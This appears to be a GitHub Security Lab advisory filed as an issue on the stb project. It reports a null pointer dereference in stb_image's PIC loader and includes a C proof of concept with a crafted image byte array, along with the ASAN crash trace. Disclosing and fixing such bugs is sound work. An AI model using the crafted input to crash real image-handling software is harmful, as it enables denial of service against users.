stb icon indicating copy to clipboard operation
stb copied to clipboard

Published 20 hours ago verified publisher icon nothings

Null pointer dereference in `stbi__convert_format` (`GHSL-2023-149`)

Open JarLob opened this issue 1 year ago • 1 comments

A crafted image file can trigger null pointer access in stbi__convert_format where src is null. It happens when stbi__pic_load_core in stbi__pic_load fails, the result is set to zero [1], but the flow continues [2].

   if (!stbi__pic_load_core(s,x,y,comp, result)) {
      STBI_FREE(result);
      result=0; // [1]
   }
   *px = x;
   *py = y;
   if (req_comp == 0) req_comp = *comp;
   result=stbi__convert_format(result,4,req_comp,x,y); // [2]

Impact

This issue may lead to denial of service.

Resources

To reproduce the issue:

  1. Make ASAN build of the following program:
#include <stdint.h>
#define STB_IMAGE_IMPLEMENTATION
#include "../stb_image.h"

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x53,0x80,0xf6,0x34,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x40,0x00,0x08,0x01,0x20,0xff,0x10,0x40,
                            0x74,0x72,0x74,0x65,0x69,0xab,0x4c,0x65,0x31,0x6e,
                            0x20,0x62,0x79,0x20,0x6d,0x65,0x6e,0x74,0x61,0x6c,
                            0x20,0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,
                            0x49,0x43,0x54,0x00,0x50,0x49,0x43,0x57,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,
                            0x08,0x01,0x20,0xff,0x10,0x6e,0x74,0x61,0x6c,0x20,
                            0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x49,
                            0x43,0x54,0x00,0x50,0x54,0x20,0x10};
    size_t size = sizeof(data);

    int x, y, z, channels;
    stbi_uc *img = stbi_load_from_memory(data, size, &x, &y, &channels, 2);
    stbi_image_free(img);
    return 0;
}
  1. Run the program to hit the error.
==183891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004f944d bp 0x7ffefb18fe50 sp 0x7ffefb18fa00 T0)
==183891==The signal is caused by a READ memory access.
==183891==Hint: address points to the zero page.
    #0 0x4f944d in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) tests/../stb_image.h:1786:52
    #1 0x4ecdbe in stbi__pic_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) tests/../stb_image.h:6535:11
    #2 0x4e463b in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) tests/../stb_image.h:1159:35
    #3 0x4dc48f in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) tests/../stb_image.h:1261:19
    #4 0x4de334 in stbi_load_from_memory tests/../stb_image.h:1431:11

JarLob avatar Oct 19 '23 14:10 JarLob

Looks like it collided with https://github.com/nothings/stb/issues/1521 which has CVE-2023-43898 assigned to it. I'll request to withdraw the CVE-2023-45665.

JarLob avatar Oct 19 '23 15:10 JarLob